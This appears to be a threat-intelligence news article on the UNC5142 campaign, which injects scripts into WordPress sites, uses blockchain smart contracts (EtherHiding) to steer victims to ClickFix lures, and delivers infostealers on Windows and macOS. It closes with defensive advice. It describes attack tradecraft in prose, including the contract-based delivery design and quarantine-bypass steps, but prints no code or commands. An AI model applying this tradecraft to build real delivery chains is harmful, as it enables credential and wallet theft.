A widespread WordPress malware campaign linked to a financially motivated group known as UNC5142 has been uncovered. The group has been abusing blockchain smart contracts to distribute information stealers including Atomic Stealer (AMOS), Lumma, Rhadamanthys (RADTHIEF), and Vidar. Security researchers from Google Threat Intelligence Group (GTIG) and Mandiant report that UNC5142 relies on a method called EtherHiding, which embeds malicious code inside blockchain transactions, making takedowns extremely difficult. This marks one of the most advanced uses of blockchain in active malware distribution campaigns and demonstrates how attackers are blending traditional compromises with Web3 technology to scale attacks across Windows and macOS systems.
How WordPress sites are compromised
UNC5142’s entry point is the exploitation of vulnerable WordPress installations. The group indiscriminately scans for outdated plugins, unpatched themes, and misconfigured sites. Once access is gained, attackers inject malicious JavaScript into plugin directories, theme files such as header.php and footer.php, or directly into the WordPress database. As of mid-2025, researchers identified over 14,000 pages carrying these injections, suggesting the campaigns reached a massive scale. These scripts serve as the first stage of infection and trigger communication with malicious smart contracts deployed on the BNB Smart Chain.
CLEARSHORT downloader and infection chain
The malicious JavaScript planted on WordPress sites is part of a downloader framework called CLEARSHORT. It evolved from a previous toolkit known as ClearFake, which pretended to be Google Chrome updates. CLEARSHORT retrieves configuration data and payloads through smart contracts rather than directly hosting them on attacker domains. The first-stage script queries blockchain contracts to fetch instructions that direct the browser to attacker-controlled landing pages. These landing pages, often hosted on Cloudflare’s *.pages.dev infrastructure, serve lures that convince victims to execute commands on their local machines.
By separating the malicious logic into blockchain-based contracts, UNC5142 ensures persistence and agility. Even if a compromised WordPress site is cleaned or a domain is blocked, the blockchain-based components remain functional and immutable. This design allows the campaign to continue with minimal interruption and cheap updates.
ClickFix and social engineering tactics
The landing pages presented to victims rely on ClickFix, a social engineering trick that pressures users into running malicious commands. Victims may see fake browser update prompts, Cloudflare “unusual traffic” errors, reCAPTCHA verification screens, or privacy agreement forms. Each lure contains carefully crafted instructions that ask the user to copy and paste a command into the Windows Run dialog or the macOS Terminal. By executing these commands locally, the victim bypasses browser protections and gives the attacker direct control to deploy malware.
On Windows systems, the command usually downloads an HTML Application (HTA) file from services like MediaFire. The HTA executes a PowerShell script designed to evade defenses and load encrypted payloads directly into memory. On macOS, victims are instructed to run a bash script that retrieves the Atomic Stealer via curl. This script also removes Apple’s quarantine attribute using xattr, ensuring the malware runs without triggering standard warning dialogs. This combination of deception and system-level execution makes the infection chain both effective and difficult to detect.
Evolution from ClearFake to CLEARSHORT
ClearFake, active since mid-2023, relied on fake Chrome update popups. Its main weakness was that payload URLs were hardcoded, making it easier for defenders to track and block. In late 2024, UNC5142 upgraded to CLEARSHORT, which leverages blockchain for dynamic delivery. Instead of embedding static links, CLEARSHORT uses smart contracts to supply landing page URLs, decryption keys, and payload information. This design removes the need for attackers to constantly modify compromised websites and makes detection significantly harder.
The introduction of a three-level smart contract system in late 2024 marked another leap in sophistication. Researchers describe this as a Router-Logic-Storage model: the first contract points to the next stage, the second handles reconnaissance and fingerprinting of victims, and the third stores payload URLs and encryption keys. Updates to any part of the chain only require a cheap blockchain transaction, costing attackers between $0.25 and $1.50. This allows for near real-time adaptation against takedowns and analysis efforts.
Main and secondary infrastructures
Investigators uncovered that UNC5142 operates two infrastructures simultaneously. The Main infrastructure was deployed in November 2024 and has been the backbone of campaigns, with frequent updates and consistent activity. In February 2025, the group launched a Secondary infrastructure, likely to expand capacity, test new payloads, or build resilience in case of disruption. Both infrastructures use nearly identical smart contract code and were funded from the same cryptocurrency wallets, making it clear they are controlled by the same operators. Transactions from both sets often occurred close together, highlighting coordinated campaign management.
Scale and impact of the campaign
By mid-2025, over 14,000 compromised WordPress pages had been linked to UNC5142’s malware distribution activities. This level of reach shows how the group indiscriminately targeted vulnerable websites across industries and geographies. The campaigns delivered a wide variety of malware families, but all were designed to steal data — from browser credentials and saved logins to cryptocurrency wallets and cloud application tokens. While no activity has been observed since July 2025, researchers caution this may only represent an operational pause as the group pivots to new methods.
Windows and macOS delivery methods
UNC5142 adapted its campaigns to both Windows and macOS. On Windows, HTA files downloaded via ClickFix lures launch PowerShell scripts that fetch encrypted payloads from MediaFire, GitHub, or attacker-controlled servers. These scripts decrypt and run malware directly in memory, leaving few forensic traces. Payloads are disguised as common file types such as MP4 videos or WAV audio files, further blending in with legitimate downloads.
On macOS, campaigns in February and April 2025 pushed Atomic Stealer. Early lures clearly labeled themselves as “macOS installation instructions,” while later ones reused the same templates as Windows campaigns. Victims were tricked into running bash commands that downloaded shell scripts, which then installed the stealer. This malware targeted Safari data, cryptocurrency wallets like MetaMask, and local keychain credentials. By disguising payloads and leveraging system commands, UNC5142 successfully bypassed standard macOS defenses.
Why blockchain malware is effective
The use of blockchain infrastructure provides UNC5142 with several strategic advantages:
- Persistence: Smart contracts cannot be deleted once deployed. The malicious data remains on the blockchain permanently.
- Agility: Attackers can cheaply update payload URLs and encryption keys without modifying compromised websites.
- Obfuscation: Traffic to blockchain nodes resembles legitimate Web3 activity, making it harder for defenders to block.
- Cost efficiency: Campaigns can be maintained and updated for under two dollars per change, keeping expenses low while scaling globally.
Lures and deception evolution
UNC5142 continually rotated its lures to avoid detection and maintain success rates. In early 2024, campaigns focused on fake Chrome updates. Later, the group adopted Cloudflare Pages to host lures, giving them an added layer of legitimacy. Victims encountered fake reCAPTCHA prompts, Cloudflare error messages, and anti-bot verification pages. Each lure was carefully designed to mimic trusted services while leading victims to execute malicious commands that bypassed browser protections.
Distribution of final payloads
UNC5142 campaigns delivered multiple families of infostealers. Vidar and Lumma targeted Windows environments, stealing browser credentials, cookies, and cryptocurrency wallets. Rhadamanthys (RADTHIEF) provided advanced credential theft capabilities, while Atomic Stealer was adapted for macOS. The diversity of payloads suggests UNC5142 operates as a distribution network, potentially renting out access or selling stolen data to other threat actors. This model is common in cybercrime, where distribution groups partner with operators of different malware families.
Community and research response
Security vendors including Google, Mandiant, and Sekoia have tracked UNC5142 extensively, documenting the group’s infrastructure and infection chains. Analysts note the group’s ability to innovate rapidly by integrating encryption, multi-contract systems, and trusted services like Cloudflare into their campaigns. While UNC5142 activity has not been observed since late July 2025, researchers caution this is likely a strategic shift. The group’s pattern of frequent updates and operational flexibility suggests they may re-emerge with new tactics designed to bypass existing defenses.
What organizations should do
- Update WordPress sites: Patch core software, plugins, and themes. Remove unsupported components to reduce risk of compromise.
- Enforce strong authentication: Use multi-factor authentication for WordPress admin accounts and restrict access where possible.
- Monitor for blockchain interactions: Watch for suspicious Web3 connections initiated by browsers, which may indicate injected JavaScript code.
- Educate users: Train staff to avoid executing commands from browser pop-ups, update prompts, or verification messages.
- Block known infrastructure: Use blocklists for attacker-controlled MediaFire, GitHub repositories, and smart contract addresses tied to UNC5142.
- Threat hunt aggressively: Look for PowerShell abuse, mshta activity, and evidence of in-memory malware execution. Monitor endpoints for infostealer behaviors.
Why this campaign matters
The UNC5142 operation illustrates how WordPress malware is evolving into advanced blockchain malware campaigns. By combining mass compromises of WordPress websites with decentralized blockchain infrastructure, attackers have created a delivery system that is cheap, scalable, and resilient against takedowns. The campaign highlights a dangerous new trend where cybercriminals repurpose legitimate Web3 technologies for malicious ends, blurring the line between normal blockchain traffic and malware operations. Organizations relying on WordPress or exposed web services must adapt quickly, hardening systems and monitoring for threats that now operate both on the surface web and decentralized blockchain platforms.
